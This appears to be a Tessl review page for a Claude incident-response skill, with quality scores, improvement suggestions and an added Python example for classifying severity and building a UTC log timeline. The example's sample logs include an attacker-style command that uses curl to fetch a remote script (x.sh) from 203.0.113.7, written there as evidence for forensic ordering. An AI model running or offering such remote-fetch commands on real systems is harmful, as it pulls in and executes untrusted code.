Assists with security incident response, investigation, and remediation. This skill is triggered when the user requests help with incident response, mentions specific incident types (e.g., data breach, ransomware, DDoS), or uses terms like "incident response plan", "containment", "eradication", or "post-incident activity". It guides the user through the incident response lifecycle, from preparation to post-incident analysis. It is useful for classifying incidents, creating response playbooks, collecting evidence, constructing timelines, and generating remediation steps. Use this skill when needing to respond to a "security incident".
Install with Tessl CLI
npx tessl i github:jeremylongshore/claude-code-plugins-plus-skills --skill responding-to-security-incidents92
Quality: 60% (Does it follow best practices?)
Impact: 98% (1.01x, average score across 9 eval scenarios)
Optimize this skill with Tessl
npx tessl skill review --optimize ./backups/skills-migration-20251108-070147/plugins/security/security-incident-responder/skills/security-incident-responder/SKILL.md
Discovery
100%. Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.
This is a well-crafted skill description that excels across all dimensions. It provides specific concrete actions, comprehensive trigger terms that users would naturally use, explicit 'when to use' guidance, and a clear security incident response niche that distinguishes it from other skills. The description uses proper third-person voice throughout.
| Dimension | Reasoning | Score |
|---|---|---|
| Specificity | Lists multiple specific concrete actions: 'classifying incidents, creating response playbooks, collecting evidence, constructing timelines, and generating remediation steps.' Also mentions guiding through the incident response lifecycle. | 3 / 3 |
| Completeness | Clearly answers both what (assists with incident response, investigation, remediation, classifying incidents, creating playbooks, etc.) AND when (explicit trigger guidance with 'This skill is triggered when...' and 'Use this skill when...' clauses with specific trigger terms). | 3 / 3 |
| Trigger Term Quality | Excellent coverage of natural terms users would say: 'incident response', 'data breach', 'ransomware', 'DDoS', 'incident response plan', 'containment', 'eradication', 'post-incident activity', 'security incident'. These are terms users would naturally use when needing this skill. | 3 / 3 |
| Distinctiveness / Conflict Risk | Clear niche focused specifically on security incident response with distinct triggers like 'data breach', 'ransomware', 'DDoS', 'containment', 'eradication'. Unlikely to conflict with general security or documentation skills due to specific incident-focused terminology. | 3 / 3 |
| Total | | 12 / 12 Passed |
Implementation
20%. Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.
This skill content reads as a high-level description or marketing overview rather than actionable guidance for incident response. It explains concepts Claude already understands, lacks concrete artifacts (playbook templates, evidence collection commands, checklists), and provides no executable examples. The content would benefit from being rewritten as actual reference material with specific, copy-paste ready resources.
Suggestions
Replace abstract descriptions with concrete playbook templates (e.g., a ransomware response checklist with specific commands like 'netstat -an | grep ESTABLISHED' for network analysis)
Add executable evidence collection commands for common scenarios (log locations, forensic tools, preservation commands)
Remove the 'How It Works' and 'When to Use This Skill' sections entirely - these explain what Claude should already infer from context
Include specific incident classification criteria (severity matrix, scope definitions) as actionable reference tables rather than prose descriptions
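Two of the artifacts the suggestions above ask for, shown as runnable code rather than prose: a severity matrix with a classifier (the "actionable reference table" of the last suggestion) and a timeline builder that normalises events from different log sources to UTC before ordering them. This is an added example written for this review page; it is not code from Tessl or from the skill under review. The severity levels, the per-type severity floors, the log formats and the sample log lines are all assumptions constructed for illustration.

```python
"""Severity matrix + classifier and a UTC-normalising timeline builder.
Added example; not from the Tessl page or the skill under review.
Levels, floors and sample logs are assumed for illustration."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
import json
import re

# Severity matrix: (impact, scope) -> severity. Assumed values; a real
# plan takes them from its incident response policy.
IMPACT_LEVELS = ("low", "medium", "high")
SCOPE_LEVELS = ("single_host", "multiple_hosts", "enterprise")
SEVERITY_MATRIX = {
    ("low", "single_host"): "SEV4",
    ("low", "multiple_hosts"): "SEV3",
    ("low", "enterprise"): "SEV3",
    ("medium", "single_host"): "SEV3",
    ("medium", "multiple_hosts"): "SEV2",
    ("medium", "enterprise"): "SEV2",
    ("high", "single_host"): "SEV2",
    ("high", "multiple_hosts"): "SEV1",
    ("high", "enterprise"): "SEV1",
}
# Incident types that get a severity floor however small the scope looks
# at triage time, because they spread or exfiltrate before scope is known.
TYPE_FLOOR = {"ransomware": "SEV2", "data_breach": "SEV2", "ddos": "SEV3"}


def classify(incident_type, impact, scope):
    """Return the severity label; a lower SEV number is more severe."""
    if impact not in IMPACT_LEVELS or scope not in SCOPE_LEVELS:
        raise ValueError(f"unknown impact/scope: {impact!r}/{scope!r}")
    sev = SEVERITY_MATRIX[(impact, scope)]
    floor = TYPE_FLOOR.get(incident_type)
    if floor is not None and int(floor[3]) < int(sev[3]):
        sev = floor
    return sev


# Timeline construction. Syslog lines carry local time and no year, so the
# caller supplies both; JSON events (an EDR feed here) carry ISO-8601 UTC.
SYSLOG_RE = re.compile(
    r"^(\w{3}) +(\d+) (\d\d:\d\d:\d\d) (\S+) (\S+?)(?:\[\d+\])?: (.*)$")
MONTHS = {m: i for i, m in enumerate(
    ("Jan", "Feb", "Mar", "Apr", "May", "Jun",
     "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"), start=1)}


@dataclass(order=True)
class Event:
    ts: datetime      # always timezone-aware UTC, so events are comparable
    host: str
    source: str
    message: str


def parse_syslog(line, year, utc_offset_hours):
    """Parse one BSD-syslog line; returns None for lines that do not match."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    mon, day, hms, host, prog, msg = m.groups()
    hh, mm, ss = (int(x) for x in hms.split(":"))
    local = datetime(year, MONTHS[mon], int(day), hh, mm, ss,
                     tzinfo=timezone(timedelta(hours=utc_offset_hours)))
    return Event(local.astimezone(timezone.utc), host, prog, msg)


def parse_json_event(line):
    d = json.loads(line)
    ts = datetime.fromisoformat(d["timestamp"].replace("Z", "+00:00"))
    return Event(ts.astimezone(timezone.utc), d["host"], d["source"], d["message"])


def build_timeline(syslog_lines, json_lines, year, utc_offset_hours):
    """Merge both sources into one list ordered by UTC timestamp."""
    events = [e for e in (parse_syslog(l, year, utc_offset_hours)
                          for l in syslog_lines) if e is not None]
    events += [parse_json_event(l) for l in json_lines]
    return sorted(events)


# Constructed sample input: web01's syslog is in local time UTC-5, the EDR
# feed is in UTC. Comparing the raw clock strings would put the EDR event
# after both syslog lines; normalising to UTC places it between them.
SAMPLE_SYSLOG = [
    "Mar  3 09:14:02 web01 sshd[2211]: Accepted password for deploy "
    "from 203.0.113.7 port 51822 ssh2",
    "Mar  3 09:15:40 web01 sudo: deploy : TTY=pts/0 ; "
    "COMMAND=/usr/bin/curl http://203.0.113.7/x.sh",
]
SAMPLE_EDR = [
    '{"timestamp": "2025-03-03T14:14:30Z", "host": "web01", "source": "edr",'
    ' "message": "sshd spawned /bin/bash for uid 1001"}',
]

if __name__ == "__main__":
    print(classify("ransomware", "low", "single_host"))
    for e in build_timeline(SAMPLE_SYSLOG, SAMPLE_EDR, 2025, -5):
        print(e.ts.strftime("%Y-%m-%dT%H:%M:%SZ"), e.host, e.source, e.message)
```

The matrix is data, not prose, so a playbook can cite it and an agent can apply it without interpretation; the severity floor is the decision point the review says is missing (a ransomware report on one host is never triaged below SEV2 just because only one host is known so far). The timeline builder handles the failure mode that most often breaks a hand-built timeline: mixing local-time syslog with UTC feeds and sorting on the raw strings.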
| Dimension | Reasoning | Score |
|---|---|---|
| Conciseness | Extremely verbose with unnecessary explanations of what the skill does, how it works, and when to use it. Claude already knows incident response concepts; this reads like marketing copy rather than actionable instructions. | 1 / 3 |
| Actionability | No concrete commands, code, or executable guidance. Examples describe what 'the skill will' do abstractly rather than providing actual playbook templates, specific commands for evidence collection, or copy-paste ready checklists. | 1 / 3 |
| Workflow Clarity | Lists high-level steps (containment, eradication, recovery) but lacks specific validation checkpoints, concrete decision points, or feedback loops for error recovery during incident response. | 2 / 3 |
| Progressive Disclosure | Content is organized into sections but everything is inline with no references to detailed playbooks, checklists, or external resources. The 'Integration' section hints at capabilities without providing actionable links or details. | 2 / 3 |
| Total | | 6 / 12 Passed |
Validation
100%. Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.
Validation — 11 / 11 Passed
Validation for skill structure
No warnings or errors.